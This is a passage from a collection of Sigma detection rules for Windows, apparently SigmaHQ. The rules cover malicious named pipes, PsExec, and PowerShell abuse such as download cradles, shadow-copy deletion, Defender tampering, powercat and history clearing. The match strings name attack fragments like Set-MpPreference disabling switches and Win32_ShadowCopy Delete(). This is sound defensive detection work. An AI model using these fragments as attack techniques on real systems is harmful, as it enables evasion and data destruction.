selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_susp_malicious_namedpipes.yml",
    "content": "title: Malicious Named Pipe Created\nid: fe3ac066-98bb-432a-b1e7-a5229cb39d4a\nstatus: test\ndescription: Detects the creation of a named pipe seen used by known APTs or malware.\nreferences:\n    - https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/\n    - https://securelist.com/faq-the-projectsauron-apt/75533/\n    - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf\n    - https://www.us-cert.gov/ncas/alerts/TA17-117A\n    - https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html\n    - https://thedfirreport.com/2020/06/21/snatch-ransomware/\n    - https://github.com/RiccardoAncarani/LiquidSnake\n    - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a\n    - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf\n    - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: Florian Roth (Nextron Systems), blueteam0ps, elhoim\ndate: 2017-11-06\nmodified: 2023-08-07\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName:\n            - '\\46a676ab7f179e511e30dd2dc41bd388'  # Project Sauron\n            - '\\583da945-62af-10e8-4902-a8f205c72b2e'  # SolarWinds SUNBURST malware\n            - '\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7'  # LiquidSnake\n            - '\\9f81f59bc58452127884ce513865ed20'  # Project Sauron\n            - '\\adschemerpc'  # Turla HyperStack\n            - '\\ahexec'  # Sofacy group malware\n            - '\\AnonymousPipe'  # Hidden Cobra Hoplight\n            - '\\bc31a7'  # Pacifier\n            - '\\bc367'  # Pacifier\n            - '\\bizkaz'  # Snatch Ransomware\n            - '\\csexecsvc' # CSEXEC default\n            - '\\dce_3d' # Qbot\n            - '\\e710f28d59aa529d6792ca6ff0ca1b34'  # Project Sauron\n            - '\\gruntsvc' # Covenant default\n            - '\\isapi_dg'  # Uroburos Malware\n            - '\\isapi_dg2'  # Uroburos Malware\n            - '\\isapi_http'  # Uroburos Malware\n            - '\\jaccdpqnvbrrxlaf' # PoshC2 default\n            - '\\lsassw'  # Wild Neutron APT malware\n            - '\\NamePipe_MoreWindows'  # Cloud Hopper - RedLeaves\n            - '\\pcheap_reuse'  # Pipe used by Equation Group malware\n            - '\\Posh*' # PoshC2 default\n            - '\\rpchlp_3'  # Project Sauron\n            - '\\sdlrpc'  # Cobra Trojan\n            - '\\svcctl' # Crackmapexec smbexec default\n            - '\\testPipe'  # Emissary Panda Hyperbro\n            - '\\winsession'  # Wild Neutron APT malware\n            # - '\\status_*' # CS default  https://github.com/SigmaHQ/sigma/issues/253\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml",
    "content": "title: PsExec Tool Execution From Suspicious Locations - PipeName\nid: 41504465-5e3a-4a5b-a5b4-2a0baadd4463\nrelated:\n    - id: f3f3a972-f982-40ad-b63c-bca6afdfad7c\n      type: derived\nstatus: test\ndescription: Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-04\nmodified: 2023-09-20\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: pipe_created\n    product: windows\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName: '\\PSEXESVC'\n        Image|contains: # Add or remove locations depending on how and if you execute Psexec in your env\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n    condition: selection\nfalsepositives:\n    - Rare legitimate use of psexec from the locations mentioned above. This will require initial tuning based on your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml",
    "content": "title: Nslookup PowerShell Download Cradle\nid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1\nrelated:\n    - id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23\n      type: similar\nstatus: test\ndescription: Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.\nreferences:\n    - https://twitter.com/Alh4zr3d/status/1566489367232651264\nauthor: Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam\ndate: 2022-12-10\nmodified: 2025-02-25\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains|all:\n            - 'powershell'\n            - 'nslookup'\n            - '[1]'\n        Data|contains:\n            - '-q=txt http'\n            - '-querytype=txt http'\n            - '-type=txt http'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml",
    "content": "title: Delete Volume Shadow Copies Via WMI With PowerShell\nid: 87df9ee1-5416-453a-8a08-e8d4a51e9ce1\nstatus: stable\ndescription: Shadow Copies deletion using operating systems utilities via PowerShell\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md\n    - https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\nauthor: frack113\ndate: 2021-06-03\nmodified: 2023-10-27\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains|all:\n            - 'Get-WmiObject'\n            - 'Win32_ShadowCopy'\n        Data|contains:\n            - 'Delete()'\n            - 'Remove-WmiObject'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml",
    "content": "title: PowerShell Downgrade Attack - PowerShell\nid: 6331d09b-4785-4c13-980f-f96661356249\nstatus: test\ndescription: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0\nreferences:\n    - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/\nauthor: Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)\ndate: 2017-03-22\nmodified: 2023-10-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains: 'EngineVersion=2.'\n    filter_main:\n        Data|contains: 'HostVersion=2.'\n    condition: selection and not filter_main\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml",
    "content": "title: PowerShell Called from an Executable Version Mismatch\nid: c70e019b-1479-4b65-b0cc-cd0c6093a599\nstatus: test\ndescription: Detects PowerShell called from an executable by the version mismatch method\nreferences:\n    - https://adsecurity.org/?p=2921\nauthor: Sean Metcalf (source), Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2023-10-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection_engine:\n        Data|contains:\n            - 'EngineVersion=2.'\n            - 'EngineVersion=4.'\n            - 'EngineVersion=5.'\n    selection_host:\n        Data|contains: 'HostVersion=3.'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_powercat.yml",
    "content": "title: Netcat The Powershell Version\nid: c5b20776-639a-49bf-94c7-84f912b91c15\nrelated:\n    - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2\n      type: derived\nstatus: test\ndescription: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network\nreferences:\n    - https://nmap.org/ncat/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md\nauthor: frack113\ndate: 2021-07-21\nmodified: 2023-10-27\ntags:\n    - attack.command-and-control\n    - attack.t1095\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains:\n            - 'powercat '\n            - 'powercat.ps1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml",
    "content": "title: Remote PowerShell Session (PS Classic)\nid: 60167e5c-84b2-4c95-a7ac-86281f27c445\nrelated:\n    - id: 96b9f619-aa91-478f-bacb-c3e50f8df575\n      type: derived\nstatus: test\ndescription: Detects remote PowerShell sessions\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-10\nmodified: 2024-01-03\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains|all:\n            - 'HostName=ServerRemoteHost'\n            - 'wsmprovhost.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use remote PowerShell sessions\n# Note: Increase the level to \"medium\" in environments that do not leverage PowerShell remoting\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml",
    "content": "title: Potential RemoteFXvGPUDisablement.EXE Abuse\nid: f65e22f9-819e-4f96-9c7b-498364ae7a25\nrelated:\n    - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation\n      type: similar\n    - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module\n      type: similar\n    - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock\n      type: similar\nstatus: test\ndescription: Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of  the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-07-13\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    service: powershell-classic\n    definition: fields have to be extract from event\ndetection:\n    selection:\n        Data|contains: 'ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter {'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml",
    "content": "title: Renamed Powershell Under Powershell Channel\nid: 30a8cb77-8eb3-4cfb-8e79-ad457c5a4592\nstatus: test\ndescription: |\n    Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: Harish Segar, frack113\ndate: 2020-06-29\nmodified: 2025-01-20\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.001\n    - attack.t1036.003\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains: 'HostName=ConsoleHost'\n    # Note: Powershell Logging Data is localized. Meaning that \"HostApplication\" field will be translated to a different field on a non english layout. This rule doesn't take this into account due to the sheer amount of possibilities. It's up to the user to add these cases.\n    filter_main_ps:\n        Data|contains:\n            - 'HostApplication=powershell'\n            - 'HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell'\n            - 'HostApplication=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell'\n            # In some cases powershell was invoked with inverted slashes\n            - 'HostApplication=C:/Windows/System32/WindowsPowerShell/v1.0/powershell'\n            - 'HostApplication=C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell'\n            - 'HostApplication=C:\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe'\n            - 'HostApplication=C:\\\\\\\\WINDOWS\\\\\\\\SysWOW64\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe'\n    filter_main_host_application_null:\n        # Note: Since we're using the raw data field to match. There is no easy way to filter out cases where the \"HostApplication\" field is null (i.e doesn't exist). We're practically forced to use a regex.\n        # If you're already mapping and extracting the field, then obviously use that directly.\n        Data|re: 'HostId=[a-zA-Z0-9-]{36}\\s+EngineVersion='\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml",
    "content": "title: Suspicious PowerShell Download\nid: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d\nrelated:\n    - id: 65531a81-a694-4e31-ae04-f8ba5bc33759\n      type: derived\nstatus: test\ndescription: Detects suspicious PowerShell download command\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2023-10-27\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection_webclient:\n        Data|contains: 'Net.WebClient'\n    selection_download:\n        Data|contains:\n            - '.DownloadFile('\n            - '.DownloadString('\n    condition: all of selection_*\nfalsepositives:\n    - PowerShell scripts that download content from the Internet\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml",
    "content": "title: Use Get-NetTCPConnection\nid: b366adb4-d63d-422d-8a2c-186463b5ded0\nstatus: test\ndescription: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell\nauthor: frack113\ndate: 2021-12-10\nmodified: 2023-10-27\ntags:\n    - attack.discovery\n    - attack.t1049\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains: 'Get-NetTCPConnection'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml",
    "content": "title: Zip A Folder With PowerShell For Staging In Temp - PowerShell\nid: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic\nrelated:\n    - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module\n      type: similar\n    - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script\n      type: similar\n    - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation\n      type: similar\nstatus: test\ndescription: |\n    Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\n    An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2021-07-20\nmodified: 2023-12-18\ntags:\n    - attack.collection\n    - attack.t1074.001\nlogsource:\n    product: windows\n    service: powershell-classic\ndetection:\n    selection:\n        Data|contains:\n            - 'Compress-Archive -Path*-DestinationPath $env:TEMP'\n            - 'Compress-Archive -Path*-DestinationPath*\\AppData\\Local\\Temp\\'\n            - 'Compress-Archive -Path*-DestinationPath*:\\Windows\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml",
    "content": "title: Tamper Windows Defender - PSClassic\nid: ec19ebab-72dc-40e1-9728-4c0b805d722c\nrelated:\n    - id: 14c71865-6cd3-44ae-adaa-1db923fae5f2\n      type: similar\nstatus: test\ndescription: Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-06-07\nmodified: 2024-01-02\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: ps_classic_provider_start\ndetection:\n    selection_set_mppreference:\n        Data|contains: 'Set-MpPreference'\n    selection_options_bool_allow:\n        Data|contains:\n            - '-dbaf $true'\n            - '-dbaf 1'\n            - '-dbm $true'\n            - '-dbm 1'\n            - '-dips $true'\n            - '-dips 1'\n            - '-DisableArchiveScanning $true'\n            - '-DisableArchiveScanning 1'\n            - '-DisableBehaviorMonitoring $true'\n            - '-DisableBehaviorMonitoring 1'\n            - '-DisableBlockAtFirstSeen $true'\n            - '-DisableBlockAtFirstSeen 1'\n            - '-DisableCatchupFullScan $true'\n            - '-DisableCatchupFullScan 1'\n            - '-DisableCatchupQuickScan $true'\n            - '-DisableCatchupQuickScan 1'\n            - '-DisableIntrusionPreventionSystem $true'\n            - '-DisableIntrusionPreventionSystem 1'\n            - '-DisableIOAVProtection $true'\n            - '-DisableIOAVProtection 1'\n            - '-DisableRealtimeMonitoring $true'\n            - '-DisableRealtimeMonitoring 1'\n            - '-DisableRemovableDriveScanning $true'\n            - '-DisableRemovableDriveScanning 1'\n            - '-DisableScanningMappedNetworkDrivesForFullScan $true'\n            - '-DisableScanningMappedNetworkDrivesForFullScan 1'\n            - '-DisableScanningNetworkFiles $true'\n            - '-DisableScanningNetworkFiles 1'\n            - '-DisableScriptScanning $true'\n            - '-DisableScriptScanning 1'\n            - '-MAPSReporting $false'\n            - '-MAPSReporting 0'\n            - '-drdsc $true'\n            - '-drdsc 1'\n            - '-drtm $true'\n            - '-drtm 1'\n            - '-dscrptsc $true'\n            - '-dscrptsc 1'\n            - '-dsmndf $true'\n            - '-dsmndf 1'\n            - '-dsnf $true'\n            - '-dsnf 1'\n            - '-dss $true'\n            - '-dss 1'\n    selection_options_actions_func:\n        Data|contains:\n            - 'HighThreatDefaultAction Allow'\n            - 'htdefac Allow'\n            - 'LowThreatDefaultAction Allow'\n            - 'ltdefac Allow'\n            - 'ModerateThreatDefaultAction Allow'\n            - 'mtdefac Allow'\n            - 'SevereThreatDefaultAction Allow'\n            - 'stdefac Allow'\n    condition: selection_set_mppreference and 1 of selection_options_*\nfalsepositives:\n    - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated.\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml",
    "content": "title: Suspicious Non PowerShell WSMAN COM Provider\nid: df9a0e0e-fedb-4d6c-8668-d765dfc92aa7\nstatus: test\ndescription: Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.\nreferences:\n    - https://twitter.com/chadtilbury/status/1275851297770610688\n    - https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/\n    - https://github.com/bohops/WSMan-WinRM\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-06-24\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    product: windows\n    service: powershell-classic\ndetection:\n    selection:\n        Data|contains: 'ProviderName=WSMan'\n    filter_main_ps:\n        Data|contains:\n            - 'HostApplication=powershell'\n            - 'HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell'\n            - 'HostApplication=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell'\n            # In some cases powershell was invoked with inverted slashes\n            - 'HostApplication=C:/Windows/System32/WindowsPowerShell/v1.0/powershell'\n            - 'HostApplication=C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell'\n    filter_main_host_application_null:\n        # Note: Since we're using the raw data field to match. There is no easy way to filter out cases where the \"HostApplication\" field is null (i.e doesn't exist). We're practically forced to use a regex.\n        # If you're already mapping and extracting the field, then obviously use that directly.\n        Data|re: 'HostId=[a-zA-Z0-9-]{36}\\s+EngineVersion='\n    filter_optional_hexnode:\n        Data|contains: 'HostApplication=C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml",
    "content": "title: Potential Active Directory Enumeration Using AD Module - PsModule\nid: 74176142-4684-4d8a-8b0a-713257e7df8e\nrelated:\n    - id: 70bc5215-526f-4477-963c-a47a5c9ebd12\n      type: similar\n    - id: 9e620995-f2d8-4630-8430-4afd89f77604\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.\nreferences:\n    - https://github.com/samratashok/ADModule\n    - https://twitter.com/cyb3rops/status/1617108657166061568?s=20\n    - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2023-01-22\ntags:\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.impact\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_cmdlet:\n        Payload|contains:\n            - 'Import-Module '\n            - 'ipmo '\n    selection_dll:\n        Payload|contains: 'Microsoft.ActiveDirectory.Management.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml",
    "content": "title: Alternate PowerShell Hosts - PowerShell Module\nid: 64e8e417-c19a-475a-8d19-98ea705394cc\nstatus: test\ndescription: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-11\nmodified: 2025-10-17\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains: '*'\n    filter_powershell:\n        # This filter covers the following use cases\n        #   - When powershell is called directly from commandline via keyword powershell or powershell.exe\n        #   - Or called via path but not with full \"\".exe\". Example: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell\n        ContextInfo|contains:\n            - '= powershell' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event\n            - '= C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell'\n            - '= C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell'\n            # In some cases powershell was invoked with inverted slashes\n            - '= C:/Windows/System32/WindowsPowerShell/v1.0/powershell'\n            - '= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell'\n            # In some cases \\??\\C:.. is used\n            - '= \\\\\\?\\?\\C:Windows\\System32\\WindowsPowerShell\\v1.0\\powershell'\n            - '= \\\\\\?\\?\\C:Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell'\n    filter_sdiagnhost:\n        ContextInfo|contains: '= C:\\WINDOWS\\System32\\sdiagnhost.exe -Embedding' # When MSDT is launched for example\n    filter_citrix:\n        ContextInfo|contains: 'ConfigSyncRun.exe'\n    filter_adace:  # Active Directory Administrative Center Enhancements\n        ContextInfo|contains: 'C:\\Windows\\system32\\dsac.exe'\n    filter_winrm:\n        ContextInfo|contains: 'C:\\Windows\\system32\\wsmprovhost.exe -Embedding'\n    filter_help_update:\n        Payload|contains:\n            - 'Update-Help'\n            - 'Failed to update Help for the module'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Programs using PowerShell directly without invocation of a dedicated interpreter\n    - MSP Detection Searcher\n    - Citrix ConfigSync.ps1\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml",
    "content": "title: Bad Opsec Powershell Code Artifacts\nid: 8d31a8ce-46b5-4dd6-bdc3-680931f1db86\nrelated:\n    - id: 73e733cc-1ace-3212-a107-ff2523cc9fc3\n      type: derived\nstatus: test\ndescription: |\n    focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\n    Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads\n    that often undergo minimal changes by attackers due to bad opsec.\nreferences:\n    - https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/\n    - https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\n    - https://www.mdeditor.tw/pl/pgRt\nauthor: 'ok @securonix invrep_de, oscd.community'\ndate: 2020-10-09\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|contains:\n            - '$DoIt'\n            - 'harmj0y'\n            - 'mattifestation'\n            - '_RastaMouse'\n            - 'tifkin_'\n            - '0xdeadbeef'\n    condition: selection_4103\nfalsepositives:\n    - 'Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments.'\nlevel: critical\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml",
    "content": "title: Clear PowerShell History - PowerShell Module\nid: f99276ad-d122-4989-a09a-d00904a5f9d2\nrelated:\n    - id: dfba4ce1-e0ea-495f-986e-97140f31af2d\n      type: derived\nstatus: test\ndescription: Detects keywords that could indicate clearing PowerShell history\nreferences:\n    - https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a\nauthor: Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-25\nmodified: 2022-12-02\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_1a_payload:\n        Payload|contains:\n            - 'del'\n            - 'Remove-Item'\n            - 'rm'\n    selection_1b_payload:\n        Payload|contains: '(Get-PSReadlineOption).HistorySavePath'\n    selection_payload_2:\n        Payload|contains|all:\n            - 'Set-PSReadlineOption'\n            - '–HistorySaveStyle'  # not sure if the homoglyph –/- is intended, just checking for both\n            - 'SaveNothing'\n    selection_payload_3:\n        Payload|contains|all:\n            - 'Set-PSReadlineOption'\n            - '-HistorySaveStyle'\n            - 'SaveNothing'\n    condition: 1 of selection_payload_* or all of selection_1*\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml",
